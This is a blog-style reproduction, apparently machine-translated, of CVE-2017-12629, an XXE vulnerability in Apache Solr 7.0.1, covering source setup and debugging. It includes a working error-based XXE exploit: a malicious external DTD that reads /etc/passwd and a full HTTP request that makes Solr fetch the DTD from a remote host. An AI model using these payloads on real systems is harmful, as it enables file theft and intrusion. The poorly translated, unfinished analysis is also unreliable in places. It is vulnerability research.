Apache Solr - XXE & RCE (1)
0x01 Foreword
The network has already done a lot of analysis and re-master now, I write this article is intended primarily for two things:
- From my own perspective to this loophole to analyze in more detail
- Write a formulaic tool plug-in, concrete framework I have not thought about, but I'll start writing my exploit code (bugscan somewhat similar to the kind of plug-in) from the vulnerability of this article, it is divided into the use of detection +
0x02 Solr source installation
If only for reproduction, directly compile official website provides binaries and can be used here way solr source installation to facilitate the breakpoint and code analysis carried out at the back.
Official website Source Address:
https://archive.apache.org/dist/lucene/solr/7.0.1/
The source code is required to install ant which case there will be a link failure cause build fails, check the links, such as http need to change https, or some libraries have a problem, need to replace the links.
0x02 Debugging
access
http://127.0.0.1:8983/
According to the below link seen
https://paper.seebug.org/425/
Fragment positioned problems
/solr/src/lucene/queryparser/src/java/org/apache/lucene/queryparser/xml/CoreParser.java
When parsing xml, parseXML using analytical methods
and the use parseXML DocumentBuilder class, parse method class may be parsed xml directly
add a collection (it had previously been added here directly test)
0x03 reproducible vulnerability
According to vulhub of poc
https://github.com/vulhub/vulhub/tree/master/solr/CVE-2017-12629-XXE
The direct use of poc-based error of XXE payload, because the interface itself there has been an error, so you can use this feature to report the error output information we want, you can refer to this specific payload
https://web-in-security.blogspot.com/2016/03/xxe-cheat-sheet.html
(1) remote server saves the following to test.dtd
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY % error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error;
(2) Open a web interface in the directory of the file, the file for the remote reading test.dtd
(3) the packet request burp
GET /solr/test/select?q=<%3fxml+version%3d"1.0"+%3f><!DOCTYPE+message+[<!ENTITY+%25+ext+SYSTEM+"http%3a//127.0.0.1%3a8088/test.dtd">+%25ext%3b]><message></message>&wt=xml&defType=xmlparser HTTP/1.1
Host: 192.168.52.129:8983
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
A successful attack
0x03
breakpoint, retroactive to the top
of the parseXML called by the parse method
XmlQparser method call
Analysis does not move. . . Beyond the upper analysis of the architecture is the problem, not being familiar with the process architecture reading, keep this one first, only know the situation where the point of vulnerability, as to what triggered the last point to the critical point have to wait after the familiar reanalysis once.